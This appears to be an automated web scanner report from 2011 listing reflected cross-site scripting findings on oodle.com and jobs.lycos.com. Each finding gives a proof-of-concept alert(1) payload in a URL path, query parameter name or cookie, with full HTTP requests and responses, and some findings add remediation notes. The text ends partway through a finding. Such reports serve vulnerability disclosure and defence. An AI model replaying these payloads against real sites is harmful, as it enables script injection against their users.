The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1b40"-alert(1)-"5a45110a48a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infob1b40"-alert(1)-"5a45110a48a/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:11 GMT Content-Length: 24558 Connection: close Set-Cookie: otu=0e9b2f20539e83aeb6e361a0a2a79299; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=6a94a58d748dae6ad3895a39fb4f6eac; path=/; domain=.oodle.com Set-Cookie: a=dT1EM0E2QkU4NDRENTAwNzU3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM5MTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ceb"><script>alert(1)</script>95125ad878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoc5ceb"><script>alert(1)</script>95125ad878a/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:10 GMT Content-Length: 24609 Connection: close Set-Cookie: otu=b0334e38197bd8adf6e68ca5a82133e6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=733a08bfc474b3cbfce20771426a9794; path=/; domain=.oodle.com Set-Cookie: a=dT1DRUYyNzdBRDRENTAwNzU2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM5MDt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
1.403. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 268c6"><script>alert(1)</script>d7aa8af63a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/safety/?268c6"><script>alert(1)</script>d7aa8af63a6=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:03 GMT Content-Length: 20723 Connection: close Set-Cookie: otu=975403cfd83248b3b5e3aa20025af4e6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=2881cf7ef7f06ee96bcec423cc0a9590; path=/; domain=.oodle.com Set-Cookie: a=dT1GOUMwOEJFQTRENTAwNzRG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM4Mzt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
1.404. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633c6"-alert(1)-"909cb315182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/safety/?633c6"-alert(1)-"909cb315182=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:04 GMT Content-Length: 20676 Connection: close Set-Cookie: otu=df673a6dda1d89a931c85bc59c89ff86; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=66c1f61b379b5eb7e84e4a0473043777; path=/; domain=.oodle.com Set-Cookie: a=dT1CRjdFNDc0QTRENTAwNzUw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM4NDt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1021e"-alert(1)-"439883458d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info1021e"-alert(1)-"439883458d7/safety_scams/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:13 GMT Content-Length: 24576 Connection: close Set-Cookie: otu=985f0a51831ef778ac366036de554279; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=2c1f9a4b4c2efb2a41d28742290b581b; path=/; domain=.oodle.com Set-Cookie: a=dT1BNTA4ODc0MzRENTAwNzU5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM5Mzt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7ed"><script>alert(1)</script>1bf94507037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /infoca7ed"><script>alert(1)</script>1bf94507037/safety_scams/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:11 GMT Content-Length: 24631 Connection: close Set-Cookie: otu=843e10f46f4835025f60048d26aa1923; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=0309ce605c61f87b50a53b9562a85f8b; path=/; domain=.oodle.com Set-Cookie: a=dT1EOTFBOEE4QjRENTAwNzU3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM5MTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
1.407. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety_scams/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d8e3"><script>alert(1)</script>6e543aff1e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /info/safety_scams/?4d8e3"><script>alert(1)</script>6e543aff1e6=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:04 GMT Content-Length: 26613 Connection: close Set-Cookie: otu=b863a6e42dc5768bb5d05195dfa715f0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=7b04c55d24ad28124ce9a91c3663ec2b; path=/; domain=.oodle.com Set-Cookie: a=dT1ENjZFMjNDRTRENTAwNzUw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM4NDt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
1.408. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/info/safety_scams/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 718e2"-alert(1)-"3e961d9a91e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /info/safety_scams/?718e2"-alert(1)-"3e961d9a91e=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:05 GMT Content-Length: 26554 Connection: close Set-Cookie: otu=63d9fc894ecf9467a9ac46ef020b3e0c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=c77b3d1c853b92c25a580d5e0bf41758; path=/; domain=.oodle.com Set-Cookie: a=dT1FMTUwQkEwMjRENTAwNzUx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM4NTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae65"%3balert(1)//8dd989f271b was submitted in the diktfc cookie. This input was echoed as bae65";alert(1)//8dd989f271b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?utm_source=lycosjobs&utm_campaign=jobs_flags&utm_medium=footer HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510bae65"%3balert(1)//8dd989f271b; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:24:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:38 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27774
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb91"><script>alert(1)</script>95e11524855 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?utm_source=lycosjobs&utm_campaign=jobs_flags&utm_medium=footer HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75107eb91"><script>alert(1)</script>95e11524855; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:24:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:33 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27442
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31396"%3balert(1)//122b7778f84 was submitted in the diktfc cookie. This input was echoed as 31396";alert(1)//122b7778f84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced-search HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B751031396"%3balert(1)//122b7778f84; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15546
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7231a"><script>alert(1)</script>821823e3891 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /advanced-search HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75107231a"><script>alert(1)</script>821823e3891; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:23:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=jobs.lycos.com/advanced-search&c5=&c6=&c15=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75107231a"><script>alert(1)</script>821823e3891.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcce"%3balert(1)//a3123a75f2c was submitted in the diktfc cookie. This input was echoed as 9fcce";alert(1)//a3123a75f2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75109fcce"%3balert(1)//a3123a75f2c; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 404 Not Found Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:22:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:56 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12127
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b664"><script>alert(1)</script>f0059a82a88 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B75108b664"><script>alert(1)</script>f0059a82a88; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;
Response
HTTP/1.1 404 Not Found Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 15:22:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:54 GMT; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12148
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24a1c"%3balert(1)//587ec8ec026 was submitted in the diktfc cookie. This input was echoed as 24a1c";alert(1)//587ec8ec026 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
